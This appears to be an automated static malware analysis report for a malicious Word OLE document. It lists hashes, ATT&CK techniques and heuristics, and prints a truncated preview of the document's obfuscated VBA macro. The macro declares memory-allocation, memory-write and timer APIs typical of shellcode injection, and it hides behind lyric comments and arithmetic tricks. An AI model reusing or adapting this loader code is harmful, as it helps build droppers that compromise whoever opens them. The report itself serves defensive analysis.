Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8de9435f36ecca6a…

MALICIOUS

Office (OLE)

Size: 206.5 KB
Created: 2017-08-08 11:42:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: 1abe20db8044ce90afe7206f2a69b188
SHA-1: 439fc2ff8fd98eded11605f28cff02649c0b0988
SHA-256: 8de9435f36ecca6ae39e76622d69ba5b95338519673cef7ffd708f446768a657
Risk score: 122

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1140 Deobfuscate/Decode Files or Information

The file is an Office document containing VBA macros, including a Document_Open macro, which runs automatically when the document is opened and is a common malware execution technique. The presence of a macro-enable lure indicates an attempt to talk the user into bypassing Office macro security settings. The VBA code itself appears to be obfuscated, suggesting an intent to hide its malicious functionality, likely downloading and executing a second-stage payload.

Heuristics (5)

  • OLE document has large unaccounted-for region (severity: high, OLE_SLACK_ANOMALY)
    OLE file is 211,458 bytes but its declared streams total only 125,149 bytes, so 86,309 bytes (41%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected (severity: medium, OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code.
  • Document_Open macro (severity: high, OLE_VBA_DOCOPEN)
    Document contains a Document_Open auto-execute macro.
  • Macro/content-enable lure (severity: medium, SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
  • Embedded URL (severity: info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The URLs below are XML namespace identifiers (XMP, RDF, Dublin Core, DrawingML) of the kind carried by embedded image and drawing metadata; the per-URL label shows they come from the document body, not from the macro code.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13266 bytes
SHA-256: ed307cbb7932b097fc2ec7968dcfeefe1f505c7e9a21d271c614fe7bfd2d8e27

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "jacks"
'  Then you rolled in with your hair in the wind
'  Rain was driving, thunder, lightning
#If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then
'  Driving us to your house
'  And hit me like a hurricane
Public Declare PtrSafe Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (napaea As Any, ByVal accipere As Any, ByVal antisubmarine As Any, ByVal suffrage As Any, ByVal millersthumb As Any, ByVal holster As Any, ByVal ankle As Any) As Long
'  I was doing alright
'  We locked eyes over whiskey on ice

'  We locked eyes over whiskey on ice
'  Driving us to your house
Public Declare PtrSafe Function naboom Lib "Ntdll.dll  " Alias "AcquireSRWLockShared" (campagne As Any) As LongPtr
'  Driving us to your house
'  You wrecked my whole world when you came
'  I was doing alright
Public Declare PtrSafe Function filefish Lib "Ntdll.dll  " Alias _
  "NtAllocateVirtualMemory" (afflictive As LongPtr, faute As LongPtr, ByVal unshockable As LongPtr, poundfoolishByVal As LongPtr, earthborn As LongPtr, ByVal boastful As LongPtr) As LongPtr
'  The moon went hiding, stars quit shining
'  But just your sight had my heart storming
Public Declare PtrSafe Function riesling Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal algorithmic As Any, ByVal distraction As Any, ByVal acrodont As Any, ByVal anglicism As Any, ByVal dynamism As Any) As LongPtr
'  Rain was driving, thunder, lightning
'  Started talking bout us again

'  If I woulda just layed my drink down
'  I was doing alright

'  But just your sight had my heart storming
'  The moon went hiding, stars quit shining
#End If
'  But you rolled in with your hair in the wind
'  You wrecked my whole world when you came
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
'  But you rolled in with your hair in the wind
'  I was doing alright
Public Declare Function riesling Lib "Ntdll.dll   " Alias "NtWriteVirtualMemory" (ByVal berried As Any, ByVal astroloma As Any, ByVal decumbency As Any, ByVal insupportable As Any, ByVal dalmatic As Any) As Long
'  Baby, without warning
'  Baby, without warning

'  But you rolled in with your hair in the wind
'  Then you rolled in with your hair in the wind
Public Declare Function filefish Lib "Ntdll.dll " Alias _
  "NtAllocateVirtualMemory" (deterrent As Long, nonoscillatory As Long, ByVal pimple As Long, bryozoanByVal As Long, synchronistical As Long, ByVal nilpotent As Long) As Long
'  But just your sight had my heart storming
'  I wouldnt be in my truck

'  I was doing alright
'  We locked eyes over whiskey on ice

'  Knew it was gonna be a long night
'  Rain was driving, thunder, lightning
'  If I woulda just layed my drink down
'  We locked eyes over whiskey on ice
Public Declare Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (opinionatist As Any, ByVal dehort As Any, ByVal peripherally As Any, ByVal lipstick As Any, ByVal survene As Any, ByVal ashtoreth As Any, ByVal craftiness As Any) As Long
'  But just your sight had my heart storming
'  And hit me like a hurricane
'  Baby, without warning
'  Knew it was gonna be a long night
#End If
'  Hit me like a hurricane
'  But just your sight had my heart storming
Function moving()
Dim pater(255) As Byte
choking = 3 - 100 + 162
Do
pater(choking) = choking - 65
choking = choking + 1
Loop While choking <= 90 + 1
choking = 40 + 8
Do
pater(choking) = choking + 4
choking = choking + 1
Loop While choking <= 50 + 8
choking = 90 + 7
Do
pater(choking) = choking - 71
choking = choking + 1
Loop While choking <= 120 + 3
pater(47) = 60 + 3
choking = 40 + 3
pater(choking) = 60 + 2
moving = pater
End Function
Function denunciation(attainture, abbess, lait)
Select Case lait
Case 33 + (10 / 2 - 5)
denunciation = attainture \ abbess
Case 43 + (5 - 3) / 2 - 1
denunciation = attainture And abbess
Case 51 + (56 / 7 - 4 * 2)
denunciation = attainture * abbess
End Select
End Function
Function bizons(wrd, buls, lky)
#If 2 + (12 * 2) > 14 / 2 And Win64 > (12 - 6 * 
... (truncated)